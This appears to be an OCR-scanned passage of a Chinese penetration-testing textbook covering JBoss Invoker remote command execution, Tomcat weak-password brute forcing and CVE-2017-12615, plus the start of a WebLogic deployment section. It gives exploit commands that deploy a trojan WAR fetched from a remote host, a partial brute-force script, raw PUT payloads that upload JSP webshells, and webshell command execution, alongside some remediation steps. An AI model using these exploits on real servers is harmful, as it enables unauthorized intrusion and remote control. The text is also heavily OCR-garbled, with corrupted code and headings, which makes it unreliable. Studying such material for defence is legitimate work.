jboss exploit fat.jar 是 JBoss Invoker 接口 未 授权 访问 远程 命令 执行 漏洞 利用 程 
JF ,通过 jboss_exploit_fat. jar 可 以 获取 操作 系统 的 基本 信息 ,并 且 可 以 部 署 木马 WAR 
包 , 获 得 远程 服务 器 shell 权限 。 


1. JBXInvoker 接口 远程 命令 执行 
JBXInvoker 接口 远程 命令 执行 过 程 如 下 : 
(1) 查看 系统 名 称 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
JMXInvokerServlet get jboss.system:type-ServerInfo OSName 


上 面 的 命令 返回 当前 操作 系统 的 名 称 , 例 如 Windows 2003. 
(2) 获取 服务 器 的 版 本 信息 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
JMXInvokerServlet get jboss.system:type-ServerInfo OSVersion 


上 面 的 命令 返回 服务 器 的 版 本 信息 ,例如 5. 2。 
(3) 远程 部 署 WAR 包 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
JMXInvokerServlet invoke jboss.system:service-MainDeployer deploy http:// 


Xx.x.x.x/test.war 
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执行 完 上 面 的 命令 ,发 现 木 马 http: //www. ctfs-wiki. com/test/test. jsp 已 经 成 功 
部 署 ,如 图 11-23 所 示 。 虽 然 HTTP 状态 码 为 500, 但 是 仍然 可 以 通过 “中 国 菜刀 ”工具 正 
常 连接 ,如 图 11-24 所 示 。 


HTTP Status 500 - 


ETE Exception report 

essage] 
T The server encountered an internal error () that prevented it from fulfilling this request. 
exceptioni 


org. apache. jasper.JasperException: java. io. UnsupportedEncodingException: null 
org. apache. jasper. servlet. JspServletWrapper.handle]spException(JspServletWrapper. java:521 
org. apache. jasper. servlet.JspServletWrapper. service (J spServletWrapper. java: 403) 
org. apache. jasper. servlet. J spServlet. service] spFile (J spServlet. java: 336) 
org. apache. jasper. servlet. J spServlet. service(JspServlet. java: 265) 
javax. servlet. http. HttpServlet. service(HttpServlet. java: 803) 
org. jboss. web. tomcat. filters. ReplyHeaderFilter. doFilter (ReplyHeaderFilter. java: 96) 


java. io.UnsupportedEncodingException: null 
java. lang. StringCoding. decode (StringCoding. java: 190) 
java lang. String. <init> (String. java: 416) 
java. lang. String. Gnit? (String. java: 481) 
org. apache. catalina. connector. Request. setCharacterEncoding (Request. java: 1478) 
org. apache. catalina. connector. RequestFacade. setCharacterEncoding (RequestFacade. java: 307) 
org. apache. jsp. jspsmall jsp. jspService (jspsmall jsp. java: 104) 
org. apache. jasper. runtime. Http]spBase. service (Http] spBase. java: 70) 
javax. servlet.http. HttpServlet. service(HttpServlet. java: 803) 
org. apache. jasper. servlet.JspServletWrapper. service (JspServletWrapper. java: 373) 
org. apache. jasper. servlet. JspServlet. serviceJspFile (JspServlet. java: 336) 
org. apache. jasper. servlet. JspServlet. service(JspServlet. java: 265) 
javax. servlet. http. HttpServlet. service(HttpServlet. java: 803) 
org. jboss. web. tancat. filters. ReplyHeaderFilter. doFilter (ReplyHeaderFilter. java: 96) 


ER The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs. 


图 11-23 木马 成 功 部 署 


server default, \deploy\managenent\ - —— — Ó — 
m —— BROLO 名称 — | 时间 xh o NÉ 
C3 awa 2015-09-10 10:06:32 0 Rw 
O ab war 2015-09-10 10:03:46 0 Rw 
loss © bene 2050810022845 — 0 RW 
server © abodwar 2050810094722 0 RW 
C defit 局 abcde war 2050910095014 — 0 RW 
a sü "m © abcdel war 2050010095426 — 0 Rw 
FIN 局 abicwar 2015-06-10 0945:36 0 RW 
Ba O consolemg.sar 2015-08-09 17:38:45 0 RW 
© selet ver 
Q drove 


图 11-24 木马 通过 “中 国 菜刀 ?工具 正常 连接 
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(4) 远程 删除 文件 \test. warNtest. jsp 文件 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
JMXInvokerServlet invoke jboss. admin: service - DeploymentFileRepository 


remove test test.jsp 


jboss exploit fat. jar 支持 输入 用 户 名 和 密码 的 带 验证 的 命令 执行 情况 : 


java -jar jboss exploit fat.jar -uname -p password -ihttp://www.ctfs-wiki. 
com/invoker/ JMXInvokerServletinvoke jboss. admin: service - 


DeploymentFileRepository remove test test.jsp 


jboss exploit fat. jar 支持 代理 模式 : 


java -jar jboss exploit fat.jar -P http://127.0.0.1:8080 - ihttp://www.ctfs 
- wiki. com/invoker/ JMXInvokerServlet invoke jboss. admin: service = 


DeploymentFileRepository remove test test.jsp 


2. EJBInvoker 接口 远程 命令 执行 
EJBInvoker 接口 远程 命令 执行 过 程 如 下 : 
(1) 查看 系统 名 称 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
EJBInvokerServlet get jboss.system:type-ServerInfo OSName 


返回 当前 操作 系统 的 名 称 ,例如 Windows 2003. 
(2) 获取 服务 器 的 版 本 信息 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
EJBInvokerServlet get jboss.system:type-ServerInfo OSVersion 


返回 服务 器 的 版 本 信息 5. 2。 
(3) 远程 部 署 WAR 包 : 


java - jar jboss exploit fat. jar - i http://www. ctfs - wiki. com/invoker/ 
EJBInvokerServlet invoke jboss.system:service-MainDeployer deploy http:// 


x.Xx.x.x/test.war 


执行 完 上 面 的 命令 ,发 现 木 马 http: //www. ctfs-wiki. com/test/test. jsp 已 经 成 功 


部 署 ,如 图 11-25 所 示 。 虽 然 HTTP 状态 码 为 500, 但 是 仍然 可 以 通过 “中 国 菜刀 ”工具 正 
常 连接 ,如 图 11-26 所 示 。 
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HTTP Status 500 - 


ETE Exception report. 


The server encountered an internal error () that prevented it from fulfilling this request. 
exceptioni 


org.apache. jasper.JasperException: java. io. UnsupportedEncodingException: null 
org. apache. jasper. servlet. J spServletWrapper. handle] spException(JspServletWrapper. java:521 
org. apache. jasper. servlet. JspServletWrapper. service (J spServletWrapper. java: 403) 
org. apache. jasper. servlet. J spServlet. service] spFile (JspServlet. java: 336) 
org. apache. jasper. servlet. J spServlet. service(JspServlet. java: 265) 
javax. servlet. http. HttpServlet. service(HttpServlet. java: 803) 
org. jboss. web. toncat. filters. ReplyHeaderFilter. doFilter (ReplyHeaderFilter. java: 06) 


[root cause] 


java. io.UnsupportedEncodingException: null 
java. lang. StringCoding. decode (StringCoding. java: 190) 
java. lang. String. <init> (String. java: 416) 
java lang. String. Ginit? (String. java: 481) 
org. apache. catalina. connector. Request. setChar acterEncoding (Request. java: 1478) 
org. apache. catalina. connector. RequestFacade. setChar acterEncoding (RequestFacade. java: 307) 
org. apache. jsp. jspsmall jsp. jspService (jspsmall jsp. java: 104) 
org. apache. jasper. runtime. Http] spBase. service (Http] spBase. java: 70) 
javax. servet. http. HttpServlet. service(HttpServlet. java: 803) 
org. apache. jasper. servlet. J spServletWrapper. service (J spServletWrapper. java: 373) 
org. apache. jasper. servlet. J spServlet. service] spFile (J spServlet. java: 336) 
org. apache. jasper. servlet. J spServlet. service(JspServlet. java: 265) 
javax. servlet. http. HttpServlet. service(HttpServlet. java: 803) 
org. jboss. veb. tancat. filters. ReplyHeaderFilter. doFilter (ReplyHeaderFilter. java: 96) 


ER The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs. 


图 11-25 木马 成 功 部 署 


server Mefaul tV, VeployWanagenenti - si 


joss 
server 


C3 default 


目录 (8), 文 件 (0) 名 称 时 间 大 小 
Cà aw 2015.06.10 10:06:32 0 
O bwar 2015-08-10 10.03.46 0 
© abcwar 2015-08-10 03:28:45 0 
C abcdwar 2015-08-10 0947-22 0 
加 abcde.war 2015-08-10 09:50:14 0 
(Cà sbcdef ww 2015-08-10 095426 0 
© abie war 2015-06-10 094536 0 
© consolemg..sar 20150809173845 — 0 


C wede ver 
局 abedef. var 
È dre. ver 


图 11-26 木马 通过 “中 国 菜刀 ”工具 正常 连接 


11.6 ”Tomcat 服务 器 漏洞 


属性 
RW 
Rw 
Rw 
Rw 
Rw 
Rw 
Rw 
Rw 


Apache Tomcat 通常 称 为 Tomcat 服务 器 ,是 由 Apache 软件 基金 会 (Apache Software 
Foundation,ASF) 开 发 的 开源 Java Servlet 容器 。Apache Tomcat 标识 如 图 11-27 所 示 。 
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Tomcat 实现 了 几 个 Java EE 规范 ,包括 Java Servlet、 


Java Server Pages(JSP) „Java EL 和 WebSocket, 并 提供 了 一 ( 
个 可 以 运行 Java 代码 的 “ 纯 Java HTTP Web 服务 器 环境 。 


m 


11.6.1 Tomcat 弱 口 令 攻 击 


Tomcat 服务 器 有 后 台 管理 功能 ,通过 后 台 管 理 可 以 上 传 

部 署 WAR 包 。 如 果 管 理 后 台 存 在 弱 口 令 , 攻 击 者 就 可 以 通过 

弱 口 令 进 入 后 台 , 通 过 部 署 WAR 包 的 功能 上 传 木马 ,获得 shell 权限 。 
1. 后 台 管 理 地 址 


默认 的 后 台 管 理 地 址 为 http://x. x. x. x: 8080/manager/html。 访 问 该 地 址 时 会 提 
示 输 入 用 户 名 、 密 码 进行 验证 ,如 图 11-28 所 示 。 


图 11-27 Apache Tomcat 
标识 


Rome Documentation Configuration Examples Wiki Mailing Lists. Find Help 
Apache Tomcat/7.0.79 / APACHE ŝi 
If you're seeing this, you've successfully installed Tomcat. Congratulations! 
e ™ Recommended Reading: Server Status 
d zese Manager App. 
e Host Manager 
BPS: 
Developer d =5: 
Tomcat Setup Servlet Specifications 
rst Web App Tomcat Versions 
Managing Tomcat | | Documentation | | Getting Help 
For security, access to the manager webappis ^ | Tomcat 7.0 Documentation | | FAQ and Mailing Lists 
restricted. Users are defined in: Bn. T s Dee ES 
SCATALINA ROME/conf/tomcat-users.xml | 
Tomcat Wiki lomcat-announce 
In Tomcat 7.0 access to the manager | | Important announcements, releases, security 
application is spit between different users. | | Find additional mportant configuration | vulnerability notifications. (Low volume). 
Read more... information in: | | 
| SCATALINA HOME/RUNNING.-xt | User support and discussion 
Release Notes Magibs-user 
Pus s | | Developers may be interested in: User support and discussion for Apache Taalbs 
angelo | | TemeatZOBuoDatsbase. domcatdev 
Migration Guide. | Tomcat 7.0 JavaDocs | Development mailing list, induding commit 
| messages 
| Security Notices | | TemÜenZoSVNReposioy 


11-28 访问 后 台 管理 地 址 时 要 验证 


2. Tomcat 口令 爆破 


通过 Python 脚本 进行 爆破 时 ,要 设置 好 需要 爆破 的 网 址 .用户 名 字典 、 密 码 字典 ， 
然后 进行 爆破 。 如 果 有 爆破 成 功 的 用 户 名 、 密 码 ,会 将 其 写 和 人 good. txt, 如 图 11-29 
所 示 。 


Tomcat 口令 爆破 使 用 的 Python 脚本 源码 如 下 : 
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图 11-29 爆破 成 功 的 


#!/usr/bin/env python 
$-*-coding: utf-8 - * - 
import sys 

import requests 

import threading 

import Queue 

import time 

import base64 

import os 


S*headers-('Content- Type ': 'application/x-www- form-urlencoded', 'User-Agent': 


PS VERS 


'Googlebot/2.1 (*[url]http://www.googlebot.com/bot.html[/url])') 


u-Queue.Queue() 
pz7Queue.Queue() 
nz-Queue.Queue() 
urls-open('url.txt','r') 
def urllist(): 
for url in urls: 
url-url.rstrip() 
u.put (url) 
def namelist(): 
names-open('name.txt','r') 
for name in names: 
name-name.rstrip() 
n.put (name) 
def passlist(): 
passwds-open('pass.txt','r') 
for passwd in passwds: 
passwd-passwd.rstrip() 
p.put (passwd) 
def weakpass (url): 
namelist() 
while not n.empty(): 
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3. Tomcat 后 台 上 传 木马 
通过 暴力 猜 解 获取 了 后 台 的 用 户 名 和 密码 为 admin ,admin。 登 录 后 台 , 即 可 利用 部 
署 WAR 包 的 功能 上 传 木马 ,以 获得 shell 权限 ,如 图 11-30 所 示 。 
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Deploy directory or WAR file located on server 


Context Path (required): 
XML Configuration file URL: 
WAR or Directory URL: 


Select WAR file to upload 选择 文件 “未 选择 任何 文件 


Deploy 


图 11-30 后 台 部 署 WAR 包 


4. Deploy 上 传 部 署 
单 击 “ 浏 览 ?按钮 ,选中 WAR 包 , 然 后 单 击 Deploy 按钮 上 传 部 署 ,如 图 11-31 所 示 。 
/AR file to deploy 


Select WAR file to upload [ 选择 文件 ) cmd war 
Deploy 


图 11-31 部 署 cmd. war X ff 


5. 部 署 成 功 
从 部 署 应 用 的 列表 可 以 看 到 已 经 成 功 部 署 cmd. war, 如 图 11-32 所 示 。 


Expire sessions with idle > 30 minutes 


Start stop  Recad | Undepioy 


docs. 
presen wihide» 30 > minutes 
Stat (suo | neas] L uroer 
ore sessons withide 30 minutes 
11-32 cmd. war 已 经 成 功 部 署 
6. 正常 解析 


访问 Webshell, 可 以 正常 解析 JSP 代码 ,并 且 可 以 执行 系统 命令 ,如 图 11-33 所 示 。 


WE) LoadURL || http://192.168.91.142:8080/cmd/cmdjsp 
Ë SplituR. 
© Execute 

Enable Post data Enable Referrer 
Commands with JSP 


| Send 


Command: whoami 


图 11-33 Webshell 正常 解析 的 效果 
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11.6.2 Tomcat 弱 口 令 漏洞 修复 


修改 /conf/tomcat-users. xml 配置 文件 ,将 二 tomcatrusers 二 节点 下 的 用 户 名 和 密码 
修改 为 复杂 度 更 高 的 用 户 名 和 密码 ,然后 重启 Tomcat 服务 器 。 
tomcat-users. xml 配置 文件 的 内 容 如 下 : 


«role rolename-"admin-gui"/» 
<role rolename-"manager-gui"/» 
«user username-"admin" password-"XXX" roles-"admin-gui, manager-gui"/» 


11.6.3 Tomcat 远程 代码 执行 漏洞 


Tomcat 远程 代码 执行 漏洞 的 编号 为 CVE-2017-12615。 在 Tomcat 配置 文件 conf/ 
Web. xml 中 , 当 readonly 设置 为 false 时 ,可 以 允许 用 PUT 或 DELETE 方法 上 传 或 删 
除 文件 。 通 过 上 传 的 JSP 文件 可 以 在 服务 器 上 执行 任意 代码 。 

Tomcat 远程 代码 执行 漏洞 影响 的 版 本 是 Apache Tomcat 5. x—9. x, 

根据 Windows 和 Linux 的 系统 特性 ,有 以 下 4 种 漏洞 利用 方法 : 

(1) /test. jsp?620( Windows) 。 

(2) /test. jsp% 2E(Windows) 。 

(3) /test. jsp: : $ DATA(Windows) 。 

(4) /test. jsp/ (Windows 和 Linux) 


1. Tomcat 远程 代码 执行 漏洞 分 析 


Tomcat 配置 文件 conf/ Web. xml 默认 将 readonly 参数 设置 为 true, 不 允许 使 用 
PUT,DELETE 方法 ,无 法 利用 Tomcat 远程 代码 执行 漏洞 ,如 图 11-34 所 示 。 


readonly ext "read only", so HTTP 
UT and DELETE are 


rejected? [true 


11-34 readonly 参数 设置 


当 将 readonly 设置 为 false 时 ,允许 使 用 PUT 或 DELETE 方法 上 传 或 删除 文件 ,如 
图 11-35 所 示 。 


servlet» 

«serviet-name»default«/servlet-name» 

«servilet-class»org.apache.catalina.servlets.DefaultServletc/servlet-class» 

«init-param» 
«param-name»debugc/param-name» 
«param-value»0«/param-value» 

</init-param> 

<init-param> 

<param-name>readonly</param-name> 

«param-value»false«/param-value» 

«/ init-param» 

«init-param» 
«param-name»listings-/param-name» 
«param-value»falsec/param-value» 

«/init-param» 

«1oad-on-startup»1«/load-on-startup» 

/servlet» 


11-35 将 readonly 设置 为 false 
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org. apache. catalina. servlets. DefaultServlet 和 org. apache. jasper. servlet. 
JspServlet 是 Tomcat 两 个 重要 的 处 理 HTTP 请 求 的 Servlet. org. apache. jasper. 
servlet. JspServlet 用 于 处 理 动态 页 面 请 求 ,如 JSP, JSPX 文件 ;其 他 文件 都 由 org. 
apache. catalina. servlets. DefaultServlet 来 处 理 , 如 图 11-36 所 示 。 


<!-- The mapping for the default servlet --» 
«servlet-mapping» 
«servlet-name»default«/servlet-name» 
«url-pattern»/«/url-pattern» 
«/servlet-mapping» 


«!-- The mappings for the JSP servlet --> 
«servlet-mapping» 
«servlet-name»jsp«/servlet-name» 


«url-pattern»*.jsp«/url-pattern» 
«url-pattern»*.jspx«/url-pattern» 
«/servlet-mapping» 


K 11-36 用 于 处 理 HTTP 请 求 的 两 个 Servlet 


通过 PUT 方法 上 传 JSP 文件 时 ,会 调用 org. apache. jasper. servlet. JspServlet 处 
理 。 在 处 理 JSP 请 求 时 会 提示 404, 因 为 org. apache. jasper. servlet. JspServlet 没有 处 理 
PUT 请 求 的 方法 。 但 是 ,如 果 为 JSP 文件 添加 扩展 名 %20 和 : : $ DATA , Tomcat 就 会 
认为 它 不 是 JSP 文件 ,调用 org. apache. catalina. servlets. DefaultServlet 处 理 此 请 求 ， 
org. apache. catalina. servlets. DefaultServlet 可 以 处 理 PUT 请 求 ,这 样 就 创建 了 文件 ， 
并 且 因 为 Windows 在 处 理 文件 时 会 自动 去 掉 文件 名 最 后 的 空格 或 者 点 号 ,这 样 就 成 功 上 
传 了 JSP 文 件 。 这 就 是 Tomcat 远程 代码 执行 漏洞 产生 的 原因 。 


2. Tomcat 远程 代码 执行 漏洞 利用 
默认 利用 PUT 方法 上 传 时 调用 org. apache. jasper. servlet. JspServlet 处 理 JSP 请 
求 , 此 时 会 提示 404, 如 图 11-37 所 示 。 


[PUT /test.jsp HTTP/1.1 T 
Host: 192.168.91.108:8080 
Cache-Control: max-age-0 
lUpgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10 12 6) 
lhppleWebKit/537.36 (KHTML, like 
ecko) Chrome/75.0.3770.100 
Safari/537.36 

DNT: 1 

Accept: 


HTTP/1.1 404 Not Found 

Server: Apache-Coyote/1l.l 
Content-Type: text/html;charset-utf-8 
Content-Language: en 

Content-Length: 967 

Date: Mon, 15 Jul 2019 12:40:18 GMT 
Connection: close 


*html»«head»«title»Apache Tomcat/7.0.57 
- Error report«/title»«style»«!--Hl 
f£ont-family:Tahoma,Arial,sans-serif;colo 


|text/html,application/xhtml*xml,applic 
ation/xml;q-0.9,image/webp,image/apng, 
^ /*:q-0.8,application/signed-exchange; 
v-b3 

Accept-Encoding: gzip, deflate 
Accept-Language: 
en,zh-CN;q-0.9,zh:q-0.8 

Cookie: 
lADMINCONSOLESESSION-1c1ndspJhvtwKGJxR5 
H6sFhMNLPDdQCG23P0400bBvcN5XGgMJ5x!628 
873947 

Connection: close 

Content-Length: 6 


(test 


r:white;background-color:$525D76;font-siz 
e:22px;) H2 
(font-family:Tahoma,Arial,sans-serif;colo 
riwhite;background-color:$525D76;font-siz 
e:l6px;) H3 
(font-family:Tahoma,Arial,sans-serif;colo 
riwhite;background-color:$525D76;font-siz 
e:l4px;) BODY 
(font-family:Tahoma,Arial,sans-serif;colo 
r:black;background-color:white;] B 
(font-family:Tahoma,Arial,sans-serif;colo 
r:white;background-color:5525D76;) P 
ífont-family:Tahoma,Arial,sans-serif;back 
ground:white;color:black;font-size:12px;) 
A (color : black;)A.name (color : 


11-37 


org. apache. jasper. servlet. JspServlet 处 理 JSP 请 求 时 提示 404 
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1) 利用 空格 绕 过 

当 在 JSP 文件 名 后 面 添 加 %20( 即 空格 ) 后 ,Tomcat 就 会 认为 它 不 是 JSP 文件 ,会 调 
用 org. apache. catalina. servlets. DefaultServlet 处 理 此 请 求 ,这 样 就 成 功 上 传 了 JSP X 
件 ,如 图 11-38 所 示 。 


PUT /test. jsp%20 HITP/1.1 HITP/1.1 201 Created 
Host: 192. 168. 91. 108:8080 Server: Apache-Coyote/1. 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Content-Length: 0 
rv:55.0) Gecko/20100101 Firefox/55.0 Date: Fri, 05 Oct 2018 04:00:10 GNT 
Accept: 
gru application/xhtml-*xml, application/xml;q-0.9,* 

1070.8 


Accept-Language: zh-CN, zh; q70. 8, en-US; q70. 5, en; q70. 3 
Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Upgrade-Insecure-Requests: 1 

Content-Length: 27 


out. print (“ctfs-wiki”);%> 


图 11-38 利用 空格 绕 过 上 传 JSP 文 件 


访问 test. jsp, 文 件 内 的 JSP 代码 可 以 正常 解析 ,输出 字符 串 ctfs-wiki, 如 图 11-39 所 示 。 


ET /test. jsp HITP/1. 1 HITP/1.1 200 OK 
lost: 192.168. 91. 108:8080 Server: Apache-Coyote/1l. 1 
|ser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Set-Cookie: 
155.0) Gecko/20100101 Firefox/55.0 JSESSIONID-F4A4DC9166E4083A05902C24EB9A3018; Path-/; 
cept: HttpOnly 
ext/html, application/xhtml*xml, application/xml ;q=0. 9, * Content-Type: text/html;charset-1S0-8859-1 
*:q70. 8 Content-Length: 9 
iccept-Language: zh-CN, zh; q70. 8, en-US; q70. 5, en; q70. 3 Date: Fri, 05 Oct 2018 04:00:36 GMT 
iccept-Encoding: gzip, deflate 
onnection: keep-alive ctfs-wiki 


grade-Insecure-Requests: l 


图 11-39 访问 test. jsp 输出 字符 串 ctfs-wiki 


2) 利用 点 号 绕 过 

当 在 JSP 文件 名 后 面 添加 点 号 (. fei» Tomcat 就 会 认为 它 不 是 JSP 文件 ,会 调用 
org. apache. catalina. servlets. DefaultServlet 处 理 此 请 求 ,这 样 就 成 功 上 传 了 JSP 文件， 
如 图 11-40 所 示 。 


PUT /test. jsp. HITP/1. 1 HITP/1.1 201 Created 

Host: 192. 168. 91. 108:8080 Server: Apache-Coyote/1. 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Content-Length: 0 

rv:55.0) Gecko/20100101 Firefox/55.0 Date: Fri, 05 Oct 2018 04:26:00 GMT 
Accept: 

text/html, application/xhtml-*xml, application/xml;q-0. 9, * 

/*;q70. 8 


Accept-Language: zh-CN, zh; q=0. 8, en-US; q=0. 5, en; q70. 3 
Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Upgrade-Insecure-Requests: 1 

Content-Length: 29 


Wout. print (“ctfs-wiki”);%> 


11-40 利用 点 号 绕 过 上 传 JSP 文 件 
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访问 test. jsp, 可 以 正常 解析 JSP 代码 ,输出 字符 串 ctfs-wiki, 如 图 11-41 所 示 。 


BET /test. jsp HITP/1. 1 HITP/1.1 200 OK 

lost: 192. 168.91. 108:8080 Server: Apache-Coyote/1. 1 

iser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Set-Cookie: 

Irv:55.0) Gecko/20100101 Firefox/55.0 JSESSIONID-DB2ASF969284CACB5691F946BC191DA7; Path-/; 
Accept: HttpOnly 

text/html, application/xhtml*xml, application/xml;q-0. 9, * Content-Type: text/html; charset-IS0-8859-1 
|/*; q=0. 8 Content-Length: 11 

ccept-Language: zh-CN, zh; q=0. 8, en-US; q=0. 5, en; q=0. 3 Date: Fri, 05 Oct 2018 04:35:37 GNT 
ccept-Encoding: gzip, deflate 

Connection: keep-alive ctfs-wiki 

jpgrade-Insecure-Requests: 1 


图 11-41 访问 test. jsp 输出 字符 串 ctfs-wiki 


3) 利用 NTFS ADS 流 绕 过 

当 在 JSP 文件 名 后 面 添 加 : : $ DATA 后 ,Tomcat 就 会 认为 它 不 是 JSP 文件 ,会 调 
用 org. apache. catalina. servlets. DefaultServlet 处 理 此 请 求 ,这 样 就 创建 了 test. jsp X. 
件 , 如 图 11-42 所 示 。 


PUT /test. jsp::$DATA HITP/1. 1 HITP/1.1 201 Created 

Host: 192. 168.91. 108:8080 Server: Apache-Coyote/1. 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Content-Length: 0 

rv:55.0) Gecko/20100101 Firefox/55.0 Date: Fri, 05 Oct 2018 04:01:13 GMT 
Accept: 

text/html, application/xhtml +xml, application/xml ;q=0. 9, * 

/*;q=0. 8 


Accept-Language: zh-CN, zh; q=0. 8, en-US; q70. 5, en; q70. 3 
Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Upgrade-Insecure-Requests: 1 

Content-Length: 27 


Nout. print (“ctfs-wiki”);N> 


图 11-42 利用 NTFS ADS 流 绕 过 上 传 JSP 文件 


访问 test. jsp, 可 以 正常 解析 JSP 代码 ,输出 字符 串 ctfs-wiki, 如 图 11-43 所 示 。 


ET /test. jsp HTTP/1, 1 HITP/1.1 200 OK 

lHost: 192. 168.91. 108:8080 Server: Apache-Coyote/1.1 

lUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64 Set-Cookie: 

v:55.0) Gecko/20100101 Firefox/55.0 JSESSIONID-B95C2BEBAA939COASE35157ECED48343; Path-/; 
Accept: HttpOnly 

text/html, application/xhtml-*xml, application/xml;q-0. 9, * Content-Type: text/html;charset-1S0-8859-1 

|/*;q70.8 Content-Length: 9 

lAccept-Language: zh-CN, zh; q70. 8, en-US; q=0. 5, en; q=0. 3 Date: Fri, 05 Oct 2018 04:01:35 GMT 

|Accept-Encodini ip, deflate 

[Connection: keep-alive ctfs-wiki 


lUpgrade-Insecure-Requests: 1 


11-43 访问 test. jsp 输出 字符 串 ctfs-wiki 


4) bypass 绕 过 

通过 fuzz 测试 ,发 现 用 斜 线 可 以 正常 创建 JSP 文件 ,并 且 在 Windows 系统 和 Linux 
系统 中 都 有 效 ,如 图 11-44 所 示 。 

用 Burp Suite 测试 ,也 发 现 用 /可 以 正常 创建 JSP 文件, 如 图 11-45 所 示 。 

访问 test. jsp, 可 以 正常 解析 JSP 代码 ,输出 字符 串 ctfs-wiki， 如 图 11-46 所 示 。 
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图 11-44 fuzz 测试 发 现 可 以 用 /正常 创建 JSP 文件 


PUT /test. jsp/ HITP/1.1 HITP/1.1 201 Created 

Host: 192. 168.91. 108:8080 Server: Apache-Coyote/1. 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Content-Length: 0 

rv:55.0) Gecko/20100101 Firefox/55.0 Date: Fri, 05 Oct 2018 04:53:02 GNT 
|Accept: 

text/html, application/xhtml-*xml, application/xml;q-0. 9, * 

/*,q=0.8 


Accept-Language: zh-CN, zh; q=0. 8, en-US; q=0. 5, en; q=0. 3 
Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Upgrade-Insecure-Requests: 1 

Content-Length: 27 


Wout. print ("ctfs-wiki”);%)| 


图 11-45 Burp Suite 测试 发 现 用 /正常 创建 JSP 文件 


HITP/1.1 200 OK 
Server: Apache-Coyote/1.] 

Set-Cookie: JSESSIONID-D1740017A1520EE741578C398AF964A6; Path-/; HttpOnly 
Content-Type: tert/html;charset=1S0-8859-1 

Content-Length: 9 

Date: Fri, 05 Oct 2018 04:53:31 GMT 


Host: 192. 168. 91. 108:8080. 
User-Agent: Mozilla/5. 0 (Windows NT 10.0; WO#64; 
[rv:55.0) Gecko/20100101 Firetox/55.0 

Accopt: 

text/html, application/zhtnl taml, application/xnl; a=D. 9, * 
/*;q-0. 8 

Accept-Language: zh-CN, zh;q=0. 8, en-US;q=0. 5, en;q=0. 3 
Accept-Encoding: gzip, deflate 

Connecticn: keep-alive 
lUpgrado-Insecuro-Requasts: 1 


ctfs-wiki 


11-46 访问 test. jsp 输出 字符 串 ctfs-wiki 


11.64 Tomcat 远程 代码 执行 漏洞 修复 


修改 Tomcat 配置 文件 conf/ Web. xml, 将 DefaultServlet 的 readonly 参数 设置 为 
true, 然 后 重启 Tomcat 服务 器 ,如 图 11-47 所 示 。 
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servlet» 
«servlet-name»defaultc/servlet-name» 
«servlet-class»org.apache.catalina.servlets.DefaultServlet«/servlet-class? 
«init-param» 
«param-name»debug«/param-name» 
X«param-value»0«/param-value» 
«/init-param» 
<init-param> 
<param-name>readonly</param-name> 
<param-value>true</param-value> 
</init-param> 
<init-param> 
«param-name»listings«/param-name» 
«param-value»false«/param-value» 
*/init-param» 
€1oad-on-startup»1«/load-on-startup» 
K/servlet: 


图 11-47 将 DefaultServlet 的 readonly 设置 为 true 


dig WebLogic RARR 


WebLogic 是 美国 Oracle 公司 发 布 的 应 用 服务 器 ,确切 地 说 是 一 个 基于 Java EE 架 
构 的 中 间 件 。WebLogic 是 用 于 开发 、 集 成 部署 和 管理 大 型 分 布 式 Web 应 用 、 网 络 应 用 
和 数据 库 应 用 的 Java 应 用 服务 器 。 它 将 Java 的 动态 功能 和 Java Enterprise 标准 的 安全 
性 引入 大 型 网 络 应 用 的 开发 集成 .部 署 和 管理 之 中 。WebLogic 标识 如 图 11-48 所 示 。 


ORACLE 
WebLogic Server? 11g 


Administration Console 


图 11-48 WebLogic 标识 


11.7.1 WebLogic 部 署 应 用 的 3 种 方式 


WebLogic 可 以 通过 3 种 方式 进行 应 用 部 署 ,分 别 是 通过 WebLogic 的 控制 台 部 署 、 
利用 autodeploy 自动 部 署 和 利用 config. xml 配置 文件 部 署 。 

WebLogic 部 署 的 应 用 都 是 WAR 包 。WAR 是 与 平台 无 关 的 文件 格式 , 它 允 许 将 许 
多 文件 组 合成 一 个 压缩 文件 。Java Web 工程 都 是 以 WAR 包 的 形式 发 布 的 。 

WAR 文件 的 典型 目录 结构 如 下 : 


Webapp.war 
| 一 index.jsp 
| 一 META- INF 
L—MANIFEST.MF // 定 义 了 与 扩展 和 包 相 关 的 数据 
— Web-INF 
-一 Web .xml //WAR 包 的 描述 文件 
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通过 jar 命令 就 可 以 将 JSP 文件 制作 成 WAR 包 。 例 如 : 


jar -cf hello.war hello.jsp 


1. 通过 控制 台 部 署 
1) 部 署 应 用 
通过 控制 台 部 署 应 用 的 过 程 如 下 : 


(1) 打开 WebLogic 的 控制 台 。WebLogic 的 控制 台 的 默认 路 径 是 根 目录 下 的 
console 目录 ,如 图 11-49 所 示 。 


[dij Load URL  [http;//www.ctfs-wiki.com:7001/console 


口 Enable Post data [ ] Enable Referrer 


ORACLE 
WebLogic Server? 11g 
Administration Console 


Welcome 


Log in to work with the WebLogic Server domain 


图 11-49 WebLogic 的 控制 台 登 录 界 面 


(2) 输入 用 户 名 、 密 码 ,进入 WebLogic 的 控制 台 , 如 图 11-50 所 示 。 


| ORACLE WebLogic Server? Administration Console 


Change Center à Home Log Out Preferences [Æ] Record Help | [a ] 
View changes and restarts Welcome, weblogic | Connected to: base_domain 
Configuration editing is enabled. Future Home 

